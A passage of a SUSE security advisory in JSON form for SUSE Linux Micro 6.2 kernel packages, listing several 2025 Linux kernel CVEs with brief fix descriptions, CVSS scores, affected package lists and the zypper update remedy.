"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39927"
},
{
"cve": "CVE-2025-40030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: check the return value of pinmux_ops::get_function_name()\n\nWhile the API contract in docs doesn\u0027t specify it explicitly, the\ngeneric implementation of the get_function_name() callback from struct\npinmux_ops - pinmux_generic_get_function_name() - can fail and return\nNULL. This is already checked in pinmux_check_ops() so add a similar\ncheck in pinmux_func_name_to_selector() instead of passing the returned\npointer right down to strcmp() where the NULL can get dereferenced. This\nis normal operation when adding new pinfunctions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40030",
"url": "https://www.suse.com/security/cve/CVE-2025-40030"
},
{
"category": "external",
"summary": "SUSE Bug 1252773 for CVE-2025-40030",
"url": "https://bugzilla.suse.com/1252773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40030"
},
{
"cve": "CVE-2025-40045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd937x: set the comp soundwire port correctly\n\nFor some reason we endup with setting soundwire port for\nHPHL_COMP and HPHR_COMP as zero, this can potentially result\nin a memory corruption due to accessing and setting -1 th element of\nport_map array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40045",
"url": "https://www.suse.com/security/cve/CVE-2025-40045"
},
{
"category": "external",
"summary": "SUSE Bug 1252784 for CVE-2025-40045",
"url": "https://bugzilla.suse.com/1252784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40045"
},
{
"cve": "CVE-2025-40097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: hda: Fix missing pointer check in hda_component_manager_init function\n\nThe __component_match_add function may assign the \u0027matchptr\u0027 pointer\nthe value ERR_PTR(-ENOMEM), which will subsequently be dereferenced.\n\nThe call stack leading to the error looks like this:\n\nhda_component_manager_init\n|-\u003e component_match_add\n |-\u003e component_match_add_release\n |-\u003e __component_match_add ( ... ,**matchptr, ... )\n |-\u003e *matchptr = ERR_PTR(-ENOMEM); // assign\n|-\u003e component_master_add_with_match( ... match)\n |-\u003e component_match_realloc(match, match-\u003enum); // dereference\n\nAdd IS_ERR() check to prevent the crash.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40097",
"url": "https://www.suse.com/security/cve/CVE-2025-40097"
},
{
"category": "external",
"summary": "SUSE Bug 1252900 for CVE-2025-40097",
"url": "https://bugzilla.suse.com/1252900"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40097"
},
{
"cve": "CVE-2025-40106",
"ids": [
{
"system_name": "SUSE CVE Page",
